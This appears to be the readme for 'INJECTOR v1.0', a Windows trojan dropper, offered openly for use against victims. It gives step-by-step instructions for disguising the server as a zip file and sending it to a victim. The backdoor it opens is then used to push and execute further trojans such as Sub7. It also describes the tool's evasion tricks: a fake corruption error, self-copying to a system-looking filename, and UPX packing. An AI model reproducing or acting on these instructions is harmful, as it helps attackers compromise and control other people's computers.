from the doc: 'Hi there! Before you proceed: This isn't just one more trojan, this is any trojan you want! I created this little tool just to be the smallest possible, with only one function: open a backdoor in the victim's PC to permit you "send & execute" remotely, just like the victim itself is running a file for us. this permits you to send any "decent" :) trojan like sub7 (~500Kb), without being souspicious..HOW TO USE: 1 - Rename the "server.zip.exe" :P 2 - Send it to the victim 3 - Find his/her IP address and type it in the IP box 4 - Press "Connect" 5 - If connected, send & execute any *.exe file you want The both (client & server) are packed with UPX, in case you wish to replace the icon resources. Once the file is sent to the victim it is automatically executed and you'll be notifyed about the success (or not) of the operation. HO MY GOD! I'VE EXECUTED THE SERVER.ZIP.EXE! Don't worry.. It is very pacific, you could test it at yourself and check its activitie with a tcp port monitor, it uses the port 13254, and once the server is executed it shows you up an error message similar to an corrupted *.zip file, something like: "the file is in unknown format or is damaged blabla..", then it copies itself to C:WIN32DLL.EXE, just to prevent from being erased by an "advanced user", and starts running from there. so, to stop it choose one of the two methods: 1 - Press ctr+alt+del and you should see two Explorer's :)) simply close one of them.. now be sure to pick the right one up else your system will boot.. lol then you could manually delete C:WIN32DLL.EXE 2 - Run the client *.exe and connect to you, (your ip or hostname) and click on "X" to close the server, now you could manually delete C:WIN32DLL.EXE It add's none registry entry and no autoruns on win startup, so be hurry on sending that powerfull trojan before the victim reboots :)'
INJECTOR v1.0
injector [client].exeserver.zip.exetrojandownloader.win32.vb.ai.exe